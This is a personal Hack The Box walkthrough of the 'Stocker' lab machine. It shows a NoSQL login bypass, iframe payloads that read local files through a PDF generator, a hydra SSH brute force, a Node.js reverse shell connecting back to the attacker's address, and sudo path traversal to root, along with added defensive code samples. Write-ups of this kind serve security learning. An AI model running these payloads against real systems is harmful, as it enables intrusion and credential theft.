https://app.hackthebox.com/machines/Stocker 20230227


exec: nmap -A 10.10.11.196 -e tun0

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 10:27 HKT
Nmap scan report for 10.10.11.196
Host is up (1.0s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.82 seconds

Add the hostname to /etc/hosts:

└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kwkl.kwkl       kwkl

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.10.11.196 stocker.htb


Browse the site.

nginx/1.18.0 (Ubuntu)

Please sign in
Username
Password


POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 23
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s
Upgrade-Insecure-Requests: 1


{"username": {"$ne": null}, "password": {"$ne": null} }


This API generates a PDF file:

Send it to Repeater:

Edit the title:

POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 317
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s

{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"Grayhat","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}


┌──(kwkl㉿kwkl)-[~/HODL/htb/stocker]
└─$ exiftool document.pdf 
ExifTool Version Number         : 12.56
File Name                       : document.pdf
Directory                       : .
File Size                       : 40 kB
File Modification Date/Time     : 2023:02:27 21:50:31+08:00
File Access Date/Time           : 2023:02:27 22:00:35+08:00
File Inode Change Date/Time     : 2023:02:27 21:50:31+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Tagged PDF                      : Yes
Creator                         : Chromium
Producer                        : Skia/PDF m108
Create Date                     : 2023:02:27 13:46:38+00:00
Modify Date                     : 2023:02:27 13:46:38+00:00


Search for a Skia/PDF m108 exploit:

https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file

Use that technique:

POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 342
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s

{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:///etc/passwd> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}


Key requests:

1: <iframe src=file:///etc/passwd height=1050px width=800px>
2: <iframe src=file:etc/nginx/nginx.conf height=1050px width=800px>
3: <iframe src=file:var/www/dev/index.js height=1050px width=800px>
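The three requests above work because the basket title is pasted into the HTML that headless Chromium renders to PDF without escaping, so an iframe in the title makes the renderer read local files into the document. As an added example (not the box's own pdf.js), the output-escaping a hardened /api/order would apply, plus a detection check over the request body; the names `escapeHtml`, `renderBasketRows` and `flagBasket` are assumptions for this illustration.

```javascript
// Added example (not the Stocker box's own pdf.js): basket fields are text,
// never markup, so escape them before they reach the HTML-to-PDF renderer.

// Escape the five characters that let text break out of an HTML text node or attribute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Build the invoice table rows the template embeds. Every user-influenced field is
// escaped and numeric fields are coerced, so text cannot be smuggled in via price either.
function renderBasketRows(basket) {
  return basket.map((item) => {
    const price = Number(item.price);
    const amount = Number(item.amount);
    if (!Number.isFinite(price) || !Number.isInteger(amount) || amount < 1) {
      throw new Error("invalid price or amount");
    }
    return `<tr><td>${escapeHtml(item.title)}</td><td>${price.toFixed(2)}</td><td>${amount}</td></tr>`;
  }).join("\n");
}

// Detection: report fields of an /api/order body that contain an HTML tag or a
// file:/javascript: URL. A legitimate basket never does, so each hit is worth a log line
// carrying the session id, even after escaping has made the request harmless.
const HTML_TAG = /<\s*\/?\s*[a-z][^>]*>/i;
const LOCAL_URL = /\b(?:file|javascript):/i;
function flagBasket(basket) {
  const findings = [];
  basket.forEach((item, index) => {
    for (const field of ["title", "description", "image"]) {
      const text = String(item[field] ?? "");
      if (HTML_TAG.test(text)) findings.push({ index, field, reason: "html-tag" });
      else if (LOCAL_URL.test(text)) findings.push({ index, field, reason: "local-url" });
    }
  });
  return findings;
}

// Constructed sample: the basket from the write-up, with the injected title.
const sampleBasket = [
  { _id: "638f116eeb060210cbd83a8f", title: "<iframe src=file:///etc/passwd height=1050px width=800px> ",
    description: "It's a rubbish bin.", image: "bin.jpg", price: 76, amount: 1 },
  { _id: "638f116eeb060210cbd83a8d", title: "Cup", description: "It's a red cup.",
    image: "red-cup.jpg", price: 32, amount: 1 },
];
console.log(flagBasket(sampleBasket));       // [ { index: 0, field: 'title', reason: 'html-tag' } ]
console.log(renderBasketRows(sampleBasket)); // the iframe survives only as &lt;iframe ...&gt; text
```

Escaping on output closes this endpoint; running the renderer without access to the server's filesystem is a separate hardening that this example does not cover.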


POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 368
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s

{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:///etc/passwd height=1050px width=800px> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}

PDF output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/



POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 379
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s

{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:etc/nginx/nginx.conf height=1050px width=800px> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}



PDF output:
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
    worker_connections 768;
    # multi_accept on;
}

http {
    ##
    # Basic Settings
    ##
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;
    # server_tokens off;
    # server_names_hash_bucket_size 64;
    # server_name_in_redirect off;
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    ##
    # SSL Settings
    ##
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
    ssl_prefer_server_ciphers on;

    ##
    # Logging Settings
    ##
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;

    ##
    # Gzip Settings
    ##
    gzip on;
    # gzip_vary on;
    # gzip_proxied any;
    # gzip_comp_level 6;
    # gzip_buffers 16 8k;
    # gzip_http_version 1.1;
    # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

    ##
    # Virtual Host Configs
    ##
    include /etc/nginx/conf.d/*.conf;

    server {
        listen 80;
        root /var/www/dev;
        index index.html index.htm index.nginx-debian.html;


POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 379
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s

{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:var/www/dev/index.js height=1050px width=800px> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}


PDF output:
const express = require("express");
const mongoose = require("mongoose");
const session = require("express-session");
const MongoStore = require("connect-mongo");
const path = require("path");
const fs = require("fs");
const { generatePDF, formatHTML } = require("./pdf.js");
const { randomBytes, createHash } = require("crypto");

const app = express();
const port = 3000;

// TODO: Configure loading from dotenv for production
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(
  session({
    secret: randomBytes(32).toString("hex"),
    resave: false,
    saveUninitialized: true,
    store: MongoStore.create({
      mongoUrl: dbURI,
    }),
  })
);
app.use("/static", express.static(__dirname + "/assets"));

app.get("/", (req, res) => {
  return res.redirect("/login");
});

app.get("/api/products", async (req, res) => {
  if (!req.session.user) return res.json([]);
  const products = await mongoose.model("Product").find();
  return res.json(products);
});

app.get("/login", (req, res) => {
  if (req.session.user) return res.redirect("/stock");
  return res.sendFile(__dirname + "/templates/login.html");
});

app.post("/login", async (req, res) => {
  const { username, password } = req.body;
  if (!username || !password) return res.redirect("/login?error=login-error");
  // TODO: Implement hashing
  const user = await mongoose.model("User").findOne({ username, password });
  if (!user) return res.redirect("/login?error=login-error");
  req.session.user = user.id;
  console.log(req.session);
  return res.redirect("/stock");
});

app.post("/api/order", async (req, res) => {
  if (!req.session.user) return res.json({});
  if (!req.body.basket) return res.json({ success: false });
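The `/login` handler above passes the parsed JSON body straight into `findOne({ username, password })`, which is why the `{"$ne": null}` body sent to /login earlier logs in as the first user: the objects become query operators. As an added example (not the box's code), a type check and an operator scan that would reject that body; `safeLoginQuery` and `findMongoOperators` are names assumed here.

```javascript
// Added example (not code from the Stocker box): reject MongoDB operator
// injection in a login body such as {"username": {"$ne": null}, ...}.

// Recursively collect every key beginning with "$" (a query operator) in a
// parsed JSON body, as dotted paths so a log entry can say where it was.
function findMongoOperators(value, prefix = "") {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((v, i) => hits.push(...findMongoOperators(v, `${prefix}[${i}]`)));
  } else if (value !== null && typeof value === "object") {
    for (const [key, v] of Object.entries(value)) {
      const here = prefix ? `${prefix}.${key}` : key;
      if (key.startsWith("$")) hits.push(here);
      hits.push(...findMongoOperators(v, here));
    }
  }
  return hits;
}

// Build the filter for User.findOne only when both credentials are plain,
// non-empty strings; objects, arrays and numbers are refused before any query.
// (Password hashing, the file's own TODO, is a separate fix not shown here.)
function safeLoginQuery(body) {
  if (!body || typeof body !== "object") return null;
  const { username, password } = body;
  if (typeof username !== "string" || typeof password !== "string") return null;
  if (username.length === 0 || password.length === 0) return null;
  return { username, password };
}

// Constructed samples: the bypass body from the write-up and an ordinary login.
const injectedBody = JSON.parse('{"username": {"$ne": null}, "password": {"$ne": null} }');
const normalBody = JSON.parse('{"username": "alice", "password": "correct-horse"}');

console.log(findMongoOperators(injectedBody)); // [ 'username.$ne', 'password.$ne' ]
console.log(safeLoginQuery(injectedBody));     // null
console.log(safeLoginQuery(normalBody));       // { username: 'alice', password: 'correct-horse' }
```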

Key findings:

mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash

const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

┌──(kwkl㉿kwkl)-[~/HODL/htb/stocker]
└─$ hydra -L user.txt -P pass.txt ssh://10.10.11.196 -t 4 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 22:31:53
[DATA] max 4 tasks per 1 server, overall 4 tasks, 12 login tries (l:3/p:4), ~3 tries per task
[DATA] attacking ssh://10.10.11.196:22/
[22][ssh] host: 10.10.11.196   login: angoose   password: IHeardPassphrasesArePrettySecure
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 22:32:42

┌──(kwkl㉿kwkl)-[~]
└─$ ssh angoose@10.10.11.196
angoose@10.10.11.196's password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$


Try https://www.revshells.com:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("sh", []);
    var client = new net.Socket();
    client.connect(9999, "10.10.10.140", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Try twice: the first attempt kept the revshells.com default IP and failed with EHOSTUNREACH; the second used the tun0 address.

angoose@stocker:~$ sudo -l
[sudo] password for angoose: 

Sorry, try again.
[sudo] password for angoose: 
Sorry, try again.
[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js
angoose@stocker:~$ pwd
/home/angoose
angoose@stocker:~$ vim what.js
angoose@stocker:~$ /usr/bin/node /usr/local/scripts/../../../home/angoose/what.js 
node:events:491
      throw er; // Unhandled 'error' event
      ^

Error: connect EHOSTUNREACH 10.10.10.140:9999
    at TCPConnectWrap.afterConnect [as oncomplete] (node:net:1300:16)
Emitted 'error' event on Socket instance at:
    at emitErrorNT (node:internal/streams/destroy:151:8)
    at emitErrorCloseNT (node:internal/streams/destroy:116:3)
    at process.processTicksAndRejections (node:internal/process/task_queues:82:21) {
  errno: -113,
  code: 'EHOSTUNREACH',
  syscall: 'connect',
  address: '10.10.10.140',
  port: 9999
}

Node.js v18.12.1
angoose@stocker:~$ vim what.js
angoose@stocker:~$ /usr/bin/node /usr/local/scripts/../../../home/angoose/what.js 
^C
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/what.js 
^C
angoose@stocker:~$ cat what.js 
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("sh", []);
    var client = new net.Socket();
    client.connect(9999, "10.10.16.13", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
angoose@stocker:~$ 

┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 9999         
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.11.196.
Ncat: Connection from 10.10.11.196:52840.
ls
user.txt
what.js
pwd
/home/angoose
cat user.txt
281c83eaba088b98d6df59be80493c85
cd /root
sh: 4: cd: can't cd to /root
id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 9999
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.11.196.
Ncat: Connection from 10.10.11.196:39426.
ls
flag.js
user.txt
what.js
cat user.txt
281c83eaba088b98d6df59be80493c85
cat flag.js
const fs = require('fs');
fs.readFile('/root/root.txt', 'utf8', (err, data) => {
  if (err) throw err;
  console.log(data);
});
cat /root/root.txt
ae1c1b43a9d4c11496940f0b908d4bea
id
uid=0(root) gid=0(root) groups=0(root)


Ref:

https://app.hackthebox.com
https://blog.csdn.net/qq_45894840/article/details/128765294

Thoughts:

Many new techniques! I feel wonderful!
